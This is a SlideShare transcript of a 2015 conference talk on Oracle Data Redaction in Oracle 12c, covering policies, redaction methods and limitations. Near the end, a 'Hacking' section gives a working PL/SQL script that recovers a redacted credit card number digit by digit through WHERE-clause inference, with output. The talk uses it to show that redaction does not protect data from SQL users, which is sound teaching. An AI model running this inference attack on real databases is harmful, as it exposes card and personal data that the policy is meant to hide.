SlideShare a Scribd company logo
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Oracle Data Redaction
Presented by:
Alex Zaballa, Oracle DBA
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Alex Zaballa
http://alexzaballa.blogspot.com/
@alexzaballa
145 and counting…
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Worked 8 years for the Ministry of Finance
March - 2007 until March - 2015
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
ORACLE ACE PROGRAM
http://www.oracle.com/technetwork/community/oracle-ace/index.html
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
https://community.oracle.com/community/other-languages/portuguese
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Oracle Data Redaction
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Data Redaction
• One of the new features introduced in Oracle
Database 12c
• Part of the Advanced Security option
• Enables the protection of data shown to the
user in real time, without requiring changes to
the application
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Data Redaction
• This new feature has been backported to
Oracle Database 11.2.0.4
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
• Applies protection at query execution time
• The stored data remain unchanged
Redaction takes place immediately preceding the return of selected data and
only at the top level of a SELECT list
• It is not an operation shown in the execution plan
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Policy
SELECT rep.object_name as "OBJECT",
rep.policy_name,
rep.expression,
rep.enable,
rec.column_name as "COLUMN",
rec.function_type
FROM redaction_policies rep,
redaction_columns rec
WHERE rep.object_owner = rec.object_owner
AND rep.object_name = rec.object_name;
OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE
------ ----------- ------------------------------------------------ ------ ------ --------------
EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
SQL> EXPLAIN PLAN FOR SELECT * FROM EMP;
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL'));
As SCOTT with the MGR role:
--------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
--------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 |
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 |
--------------------------------------------------------------------------
As SCOTT without the MGR role:
--------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
--------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 |
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 |
--------------------------------------------------------------------------
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Not to be confused with
Oracle Data Masking
With Oracle Data Masking, the data is processed
using masked shapes and this updated data is
stored in new data blocks. For this reason, Data
Masking is more suitable for non-production
environments.
** Oracle Data Masking is available only with Enterprise
Edition database and it requires licensing of Advanced
Security.
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Below are some other features that already
existed to help making the data more secure:
•Virtual Private Database (VPD) - Allows control access
on both row and column levels by dynamically adding a
predicate to SQL statements issued against the database.
•Oracle Label Security – Allows you to add user-defined
values ​​to table records combining it with VPD to allow fine
control of who sees what​​.
•Database Vault – Data Redaction does not prevent
privileged users (such as DBAs) from having access to the
data being protected. To solve this, you can make use of
Database Vault.
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Planning on Oracle Data Redaction Policy
1. Ensure that you have been granted the EXECUTE privilege on
the DBMS_REDACT PL/SQL package.
2. Determine the data type of the table or view column that you want to
redact.
3. Ensure that this column is not used in an Oracle Virtual Private
Database (VPD) row filtering condition. That is, it must not be part of
the VPD predicate generated by the VPD policy function.
4. Decide on the type of redaction that you want to perform: full,
random, partial, regular expressions, or none.
5. Decide which users to apply the Data Redaction policy to.
6. Based on this information, create the Data Redaction policy by using
the DBMS_REDACT.ADD_POLICY procedure.
7. Configure the policy to have additional columns to be redacted
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Conditional Redaction Examples
•User Environment
expression => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''PSMITH'''
•Database Role
expression => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''SUPERVISOR'') = ''FALSE'''
•Oracle Label Security Label Dominance
expression => 'OLS_LABEL_DOMINATES (''hr_ols_pol'',''hs'') = 0'
•Application Express Session States
expression => 'V(''APP_USER'') != ''mavis@example.com'' or V(''APP_USER'') is null'
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
DBMS_REDACT
• DBMS_REDACT.ALTER_POLICY
Allows changes to existing policies.
• DBMS_REDACT.DISABLE_POLICY
Disables an existing policy.
• DBMS_REDACT.DROP_POLICY
Drop an existing policy.
• DBMS_REDACT.ENABLE_POLICY
Enables an existing policy.
• DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES
Change the default return value for full redaction.
You must restart the database to take effect.
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Redaction Methods
• Full redaction
• Partial redaction
• Regular expressions
• Random redaction
• No redaction
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
FULL Data Redaction
•Character Data Types
The output text is a single space
•Number Data Types
The output text is a zero
•Date-Time Data Types
The output text is set to the first day of January, 2001
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
RANDOM Data Redaction
•CHAR Data Types
Redacted in same character set and byte length as the column
definition
•Number Data Types
Redacted in same character set and the length is limited based
on the length of the actual data
•Date-Time Data Types
Redacted as random dates that are always different from those
of the actual data
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Column data types
NUMBER, BINARY_FLOAT, BINARY_DOUBLE,
CHAR, VARCHAR2, NCHAR, NVARCHAR2,
DATE, TIMESTAMP, TIMESTAMP WITH TIME
ZONE, BLOB, CLOB, and NCLOB
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Operational Activities - No Redaction
•Backup and Restore
•Import and Export
•Patching and Upgrades
•Replication
•Users SYS and SYSTEM automatically have
the EXEMPT REDACTION POLICY system
privilege
•Data Redaction is not enforced for users
connected as SYSDBA
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Data Redaction and Data Pump
ORA-28081: Insufficient privileges - the command
references a redacted object
Use the EXEMPT REDACTION POLICY system privilege
in these cases. However, use it with caution.
Note that the role DATAPUMP_EXP_FULL_DATABASE
includes the EXEMPT REDACTION POLICY system
privilege
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
If you try to CREATE TABLE ... AS SELECT (CTAS) against a
redacted table you get the following error message: ORA-
28081: Insufficient privileges - the command references a
redacted object.
In order to perform a CREATE TABLE AS SELECT operation from
a table protected by an active redaction policy, the user must
have privileges to see the actual data on the source table
Because applications may need to perform CREATE TABLE AS
SELECT operations that involve redacted source columns, you
can grant the application the EXEMPT DDL REDACTION
POLICY system privilege.
Data Redaction and CTAS
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Redacted Columns and GROUP BY SQL Expressions
Redacted Columns included in SQL expressions on a GROUP BY clause will fail as follows:
SQL> select * from emp;
EMP_NO NAME SALARY
---------- ---------------------------------------- ----------
1 Daniel 702
2 Juca 607
3 Manuel 314
SQL> select (salary*1.10) from emp group by (salary*1.10);
select (salary*1.10) from emp group by (salary*1.10)
*
ERROR at line 1:
ORA-00979: not a GROUP BY expression
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Redacted Columns and Virtual Columns
SQL> alter table hr.employees add sal number as (salary*1.10) virtual;
alter table hr.employees add sal number as (salary*1.10) virtual
*
ERROR at line 1:
ORA-28083: A redacted column was referenced in a virtual column expression.
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
•Columns from MVIEWS as well as regular VIEWS
can be redacted
Data Redaction and Views
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Overhead
• It could reach up to 10% of performance impact
when using complex Regular Expressions
• Between 2-3% performance impact using other
redaction methods
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
•Never to be considered as a way to protect data from
anyone with SQL access to the database
•Extremely easy to hack once you have access to SQL
•It was never designed to protect data from the attack
we will demonstrate
Hacking
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Let’s consider the following Redaction Policy:
BEGIN
DBMS_REDACT.ADD_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name
=> 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', expression =>
'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') = ''WATCHER''');
DBMS_REDACT.ALTER_POLICY (OBJECT_SCHEMA => 'DDAMEDA',
object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO',
action => DBMS_REDACT.ADD_COLUMN, column_name => '"CREDITCARD_NO"',
function_type => DBMS_REDACT.REGEXP , regexp_pattern =>
.*(dddd)$,regexp_replace_string =>
************1,regexp_position => 1,regexp_occurrence =>
1,regexp_match_parameter => i);
Hacking - Finding Actual Values by
Inference
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
SQL> SHOW USER
USER is "WATCHER“
SQL> SELECT * FROM customers;
CUSTOMER_ID NAME CREDITCARD_NO
----------- -------------------- ----------------
1 Daniel Da Meda ************4368
2 Alex Zaballa ************5211
3 Antonio Mateus ************5005
Hacking - Finding Actual Values by
Inference
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
SET TIMING ON
SET SERVEROUTPUT ON
DECLARE
vcreditcard_no CUSTOMERS.creditcard_no%TYPE;
vcustomer_name CUSTOMERS.name%TYPE;
BEGIN
FOR a in 1..19 LOOP
IF a NOT IN (5,10,15) THEN
FOR b in 0..9 LOOP
BEGIN
SELECT name
INTO vcustomer_name
FROM CUSTOMERS
WHERE customer_id=2
AND SUBSTR(creditcard_no,a,1) = b;
vcreditcard_no:=vcreditcard_no||b;
EXCEPTION
WHEN NO_DATA_FOUND THEN
NULL;
END;
END LOOP;
ELSE
vcreditcard_no:=vcreditcard_no||'-';
END IF;
END LOOP;
DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no);
END;
/
Hacking - Finding Actual Values by
Inference
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
vi get_creditcard.sql
[oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev
SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014
Copyright (c) 1982, 2014, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit
Production
With the Partitioning, Automatic Storage Management, OLAP, Advanced
Analytics
and Real Application Testing options
SQL> @get_creditcard.sql
Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211
PL/SQL procedure successfully completed.
Elapsed: 00:00:00.03
Hacking - Finding Actual Values by
Inference
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Time for SQLcl ?
08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
Thank You

More Related Content

What's hot

Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
Alex Zaballa
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
Alex Zaballa
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
Alex Zaballa
 
Oracle Data Redaction - UKOUG - TECH14
Oracle Data Redaction - UKOUG - TECH14Oracle Data Redaction - UKOUG - TECH14
Oracle Data Redaction - UKOUG - TECH14
Alex Zaballa
 
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse SupportOracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
nkarag
 
Extending MySQL Enterprise Monitor
Extending MySQL Enterprise MonitorExtending MySQL Enterprise Monitor
Extending MySQL Enterprise Monitor
Mark Leith
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
Alex Zaballa
 
Dan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New FeaturesDan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New Features
Embarcadero Technologies
 
TSQL in SQL Server 2012
TSQL in SQL Server 2012TSQL in SQL Server 2012
TSQL in SQL Server 2012
Eduardo Castro
 
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
Tony jambu   (obscure) tools of the trade for tuning oracle sq lsTony jambu   (obscure) tools of the trade for tuning oracle sq ls
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
InSync Conference
 
TSQL Coding Guidelines
TSQL Coding GuidelinesTSQL Coding Guidelines
TSQL Coding Guidelines
Chris Adkin
 
Developing Information Schema Plugins
Developing Information Schema PluginsDeveloping Information Schema Plugins
Developing Information Schema Plugins
Mark Leith
 
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu   (obscure) tools of the trade for tuning oracle sq lsTony Jambu   (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
InSync Conference
 
06 Using More Package Concepts
06 Using More Package Concepts06 Using More Package Concepts
06 Using More Package Concepts
rehaniltifat
 
Using AWR for SQL Analysis
Using AWR for SQL AnalysisUsing AWR for SQL Analysis
Using AWR for SQL Analysis
Texas Memory Systems, and IBM Company
 
07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development
rehaniltifat
 
MySQL Monitoring Mechanisms
MySQL Monitoring MechanismsMySQL Monitoring Mechanisms
MySQL Monitoring Mechanisms
Mark Leith
 
Oracle vs. SQL Server- War of the Indices
Oracle vs. SQL Server- War of the IndicesOracle vs. SQL Server- War of the Indices
Oracle vs. SQL Server- War of the Indices
Kellyn Pot'Vin-Gorman
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 

What's hot (19)

Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
Oracle Data Redaction - UKOUG - TECH14
Oracle Data Redaction - UKOUG - TECH14Oracle Data Redaction - UKOUG - TECH14
Oracle Data Redaction - UKOUG - TECH14
 
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse SupportOracle SQL Tuning for Day-to-Day Data Warehouse Support
Oracle SQL Tuning for Day-to-Day Data Warehouse Support
 
Extending MySQL Enterprise Monitor
Extending MySQL Enterprise MonitorExtending MySQL Enterprise Monitor
Extending MySQL Enterprise Monitor
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
 
Dan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New FeaturesDan Hotka's Top 10 Oracle 12c New Features
Dan Hotka's Top 10 Oracle 12c New Features
 
TSQL in SQL Server 2012
TSQL in SQL Server 2012TSQL in SQL Server 2012
TSQL in SQL Server 2012
 
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
Tony jambu   (obscure) tools of the trade for tuning oracle sq lsTony jambu   (obscure) tools of the trade for tuning oracle sq ls
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
 
TSQL Coding Guidelines
TSQL Coding GuidelinesTSQL Coding Guidelines
TSQL Coding Guidelines
 
Developing Information Schema Plugins
Developing Information Schema PluginsDeveloping Information Schema Plugins
Developing Information Schema Plugins
 
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu   (obscure) tools of the trade for tuning oracle sq lsTony Jambu   (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
 
06 Using More Package Concepts
06 Using More Package Concepts06 Using More Package Concepts
06 Using More Package Concepts
 
Using AWR for SQL Analysis
Using AWR for SQL AnalysisUsing AWR for SQL Analysis
Using AWR for SQL Analysis
 
07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development
 
MySQL Monitoring Mechanisms
MySQL Monitoring MechanismsMySQL Monitoring Mechanisms
MySQL Monitoring Mechanisms
 
Oracle vs. SQL Server- War of the Indices
Oracle vs. SQL Server- War of the IndicesOracle vs. SQL Server- War of the Indices
Oracle vs. SQL Server- War of the Indices
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 

Similar to Oracle Data redaction - GUOB - OTN TOUR LA - 2015

Performance Tuning for Visualforce and Apex
Performance Tuning for Visualforce and ApexPerformance Tuning for Visualforce and Apex
Performance Tuning for Visualforce and Apex
Salesforce Developers
 
Hands-On Lab: CA PPM Data Warehouse
Hands-On Lab: CA PPM Data WarehouseHands-On Lab: CA PPM Data Warehouse
Hands-On Lab: CA PPM Data Warehouse
CA Technologies
 
004_Config_WhseStructure_and_Master_Data.pdf
004_Config_WhseStructure_and_Master_Data.pdf004_Config_WhseStructure_and_Master_Data.pdf
004_Config_WhseStructure_and_Master_Data.pdf
Dipak Banerjee
 
Advance Sql Server Store procedure Presentation
Advance Sql Server Store procedure PresentationAdvance Sql Server Store procedure Presentation
Advance Sql Server Store procedure Presentation
Amin Uddin
 
Clientadmin
ClientadminClientadmin
2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018 - Tuning DBA ...
2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018  - Tuning DBA ...2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018  - Tuning DBA ...
2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018 - Tuning DBA ...
Marcus Vinicius Miguel Pedro
 
Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015 Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015
Alex Zaballa
 
Gems to help you troubleshoot query performance
Gems to help you troubleshoot query performanceGems to help you troubleshoot query performance
Gems to help you troubleshoot query performance
Pedro Lopes
 
Database@Home : The Future is Data Driven
Database@Home : The Future is Data DrivenDatabase@Home : The Future is Data Driven
Database@Home : The Future is Data Driven
Tammy Bednar
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
Alex Zaballa
 
Azure data stack_2019_08
Azure data stack_2019_08Azure data stack_2019_08
Azure data stack_2019_08
Alexandre BERGERE
 
Sql Portfolio
Sql PortfolioSql Portfolio
Sql Portfolio
Shelli Ciaschini
 
Df12 Performance Tuning
Df12 Performance TuningDf12 Performance Tuning
Df12 Performance Tuning
Stuart Bernstein
 
MySQL Performance Schema, Open Source India, 2015
MySQL Performance Schema, Open Source India, 2015MySQL Performance Schema, Open Source India, 2015
MySQL Performance Schema, Open Source India, 2015
Mayank Prasad
 
IDERA Live | Leverage the Query Store for Better SQL Server Performance
IDERA Live | Leverage the Query Store for Better SQL Server PerformanceIDERA Live | Leverage the Query Store for Better SQL Server Performance
IDERA Live | Leverage the Query Store for Better SQL Server Performance
IDERA Software
 
Getting Started With Apex REST Services
Getting Started With Apex REST ServicesGetting Started With Apex REST Services
Getting Started With Apex REST Services
Salesforce Developers
 
2015 01 26_5212_2__transparent_archiving_with
2015 01 26_5212_2__transparent_archiving_with2015 01 26_5212_2__transparent_archiving_with
2015 01 26_5212_2__transparent_archiving_with
Peter Schouboe
 
Admin Guiding Query Plans
Admin Guiding Query PlansAdmin Guiding Query Plans
Admin Guiding Query Plans
rsnarayanan
 
SAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeries
SAP Technology
 
oracle_2015
oracle_2015oracle_2015
oracle_2015
Badripatil Patil
 

Similar to Oracle Data redaction - GUOB - OTN TOUR LA - 2015 (20)

Performance Tuning for Visualforce and Apex
Performance Tuning for Visualforce and ApexPerformance Tuning for Visualforce and Apex
Performance Tuning for Visualforce and Apex
 
Hands-On Lab: CA PPM Data Warehouse
Hands-On Lab: CA PPM Data WarehouseHands-On Lab: CA PPM Data Warehouse
Hands-On Lab: CA PPM Data Warehouse
 
004_Config_WhseStructure_and_Master_Data.pdf
004_Config_WhseStructure_and_Master_Data.pdf004_Config_WhseStructure_and_Master_Data.pdf
004_Config_WhseStructure_and_Master_Data.pdf
 
Advance Sql Server Store procedure Presentation
Advance Sql Server Store procedure PresentationAdvance Sql Server Store procedure Presentation
Advance Sql Server Store procedure Presentation
 
Clientadmin
ClientadminClientadmin
Clientadmin
 
2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018 - Tuning DBA ...
2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018  - Tuning DBA ...2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018  - Tuning DBA ...
2018 - GUOB Tech Day /Oracle Developer Community LAD Tour 2018 - Tuning DBA ...
 
Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015 Data Redaction - OTN TOUR LA 2015
Data Redaction - OTN TOUR LA 2015
 
Gems to help you troubleshoot query performance
Gems to help you troubleshoot query performanceGems to help you troubleshoot query performance
Gems to help you troubleshoot query performance
 
Database@Home : The Future is Data Driven
Database@Home : The Future is Data DrivenDatabase@Home : The Future is Data Driven
Database@Home : The Future is Data Driven
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
 
Azure data stack_2019_08
Azure data stack_2019_08Azure data stack_2019_08
Azure data stack_2019_08
 
Sql Portfolio
Sql PortfolioSql Portfolio
Sql Portfolio
 
Df12 Performance Tuning
Df12 Performance TuningDf12 Performance Tuning
Df12 Performance Tuning
 
MySQL Performance Schema, Open Source India, 2015
MySQL Performance Schema, Open Source India, 2015MySQL Performance Schema, Open Source India, 2015
MySQL Performance Schema, Open Source India, 2015
 
IDERA Live | Leverage the Query Store for Better SQL Server Performance
IDERA Live | Leverage the Query Store for Better SQL Server PerformanceIDERA Live | Leverage the Query Store for Better SQL Server Performance
IDERA Live | Leverage the Query Store for Better SQL Server Performance
 
Getting Started With Apex REST Services
Getting Started With Apex REST ServicesGetting Started With Apex REST Services
Getting Started With Apex REST Services
 
2015 01 26_5212_2__transparent_archiving_with
2015 01 26_5212_2__transparent_archiving_with2015 01 26_5212_2__transparent_archiving_with
2015 01 26_5212_2__transparent_archiving_with
 
Admin Guiding Query Plans
Admin Guiding Query PlansAdmin Guiding Query Plans
Admin Guiding Query Plans
 
SAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeries
 
oracle_2015
oracle_2015oracle_2015
oracle_2015
 

More from Alex Zaballa

Migrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCIMigrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCI
Alex Zaballa
 
Exploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle CloudExploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle Cloud
Alex Zaballa
 
Moving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle CloudMoving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle Cloud
Alex Zaballa
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
Alex Zaballa
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
Alex Zaballa
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
Alex Zaballa
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUDLET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
Alex Zaballa
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
Alex Zaballa
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
Moving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle CloudMoving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle Cloud
Alex Zaballa
 
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Alex Zaballa
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
Alex Zaballa
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
Alex Zaballa
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
Alex Zaballa
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
Alex Zaballa
 
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Alex Zaballa
 
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
